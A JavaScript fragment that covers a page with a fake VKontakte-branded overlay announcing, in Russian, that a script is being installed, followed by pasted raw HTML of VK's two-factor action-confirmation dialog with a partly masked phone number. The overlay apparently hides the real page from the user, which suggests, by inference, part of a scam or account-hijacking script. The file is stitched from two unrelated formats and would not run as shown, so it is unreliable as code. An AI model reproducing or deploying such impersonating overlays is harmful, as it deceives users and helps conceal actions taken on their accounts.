//Создание стилей CSS
var css = '#baner{ z-index:99999; background: rgba(0,0,0,.9); width: 100%;height: 100%;position: fixed; left: 0px; top: 0px;}';
style = document.createElement('style');
style.type = 'text/css';
style.appendChild(document.createTextNode(css));

//Создание блока
var head = document.children[0];
var newDiv = document.createElement('div');
newDiv.id = 'baner';

//VK Styles
newDiv.innerHTML= '<div class="page" style="max-width:960px;margin: 0 auto;text-align:center;"><table id="container" class="container" style="  width: 656px;margin: 0px auto;  height: auto;  background: #FFFFFF;  -webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.35);  -moz-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.35);  box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.35);" cellspacing="0" cellpadding="0"><tbody><tr><td class="head"><a href="https://vk.com" target="_blank" class="logo"></a>  </td></tr><tr> <td> <div id="box_cont">  <div id="box" class="box" style="background: white;    min-height: 110px;">    <div class="info permissions_info">       <div class="app_info">        <img src="https://vk.com/images/dquestion_d.png" width="75" height="75">     </div>       <div class="items">        <div class="grant_access_title"><b>Выполняеться установка скрипта</b> <p>Пожалуйста подождите.<p></div>             </div>    </div>  </div> </div></td></tr></tbody></table></div>';
head.appendChild(newDiv);    
head.appendChild(style);








<div id="box_layer_wrap" class="scroll_fix_wrap fixed" style="width: 936px; height: 643px; display: block;"><div id="box_layer" style="width: 918px;"><div id="box_loader" style="display: none; margin-top: 197.667px;"><div class="loader"></div><div class="back"></div></div><div class="popup_box_container box_dark" style="width: 520px; height: auto; margin-top: 93px;"><div class="box_layout" onclick="__bq.skip=true;"><div class="box_title_wrap" style="display: none;"><div class="box_x_button">Закрыть</div><div class="box_title"></div></div><div class="box_body box_no_title" style="padding: 25px; display: block;"><div id="validation_box" class="push_validation_box">
  <a class="fl_r" onclick="curBox().hide(); return false;">Отмена</a>
  <h2>Подтверждение действия</h2>
  <div class="validation_text">Для подтверждения действия мы отправили уведомление на Ваше устройство:</div>
  <div class="validation_form">
    <div id="validation_submit_result" class="box_msg"></div>
    <div id="validation_pushed_device">
  <div class="validation_row clear_fix">
  <div class="validation_device_thumb validation_device_thumb_android_ru fl_l"></div>
  <div class="validation_device_info fl_l">
    <div class="validation_device_info_name">Asus K010</div>
    Приложение VK
  </div>
</div>
  <div class="validation_no_push"><a onclick="return cur.validationNoPush();">Не дошло уведомление?</a></div>
</div>
<div id="validation_devices" class="unshown">
  <div class="validation_devices_wrap validation_row">
    <div class="radiobtn on" onclick="cur.validationDeviceChange(this, '0');"><div></div>Asus K010<span class="validation_device_notice">Приложение VK</span></div><div class="radiobtn " onclick="cur.validationDeviceChange(this, 'sms');"><div></div>SMS-сообщение<span class="validation_device_notice">+380&nbsp;****&nbsp;*&nbsp;**&nbsp;51 <a href="/settings?f=cphone,settings_new_phone" onclick="curBox.hide(); return nav.go(this, event);">(изменить номер)</a></span></div>
  </div>
  <div class="validation_submit_row">
    <button id="validation_send_phone" class="flat_button button_wide button_big" onclick="cur.validationPushResend();">Запросить подтверждение</button>
  </div>
</div>
    <div id="validation_code_row" class="validation_row" style="display: none">
      <div id="validation_code_wrap">
        <div class="validation_label">Код подтверждения</div>
        <input type="text" class="big_text" id="validation_code" onfocus="cur.validationCodeTip()" onblur="cur.validationHideTip()" value="" onkeydown="if (event.keyCode == 10 || event.keyCode == 13) { this.blur(); cur.validationSubmitCode(); }">
      </div>
    </div>
    <div id="validation_phone_submit" class="validation_submit_row" style="display: none">
      <button id="validation_send_phone" class="flat_button button_wide button_big" onclick="cur.validationSubmitPhone();">Получить код</button>
      <div class="validation_skip" style="display: none">
        <a id="validation_skip" onclick="cur.validationShowCaptcha()">Пропустить ввод номера</a>
      </div>
    </div>
    <div id="validation_code_submit" class="validation_submit_row" style="display: none">
      <button id="validation_send_code" class="flat_button button_wide button_big" onclick="cur.validationSubmitCode()">Отправить код</button>
    </div>
    <div id="validation_resend" class="validation_no_code" style="display: none">
      Выслать код повторно через 1:00
    </div>
  </div>
  <div class="push_validation_img"></div>
</div></div><div class="box_controls_wrap" style="display: none;"><div class="box_controls"><table cellspacing="0" cellpadding="0" class="fl_r"><tbody><tr><td><button class="flat_button">Закрыть</button></td></tr></tbody></table><div class="progress" id="box_progress0"></div><div class="box_controls_text"></div></div></div></div></div></div></div>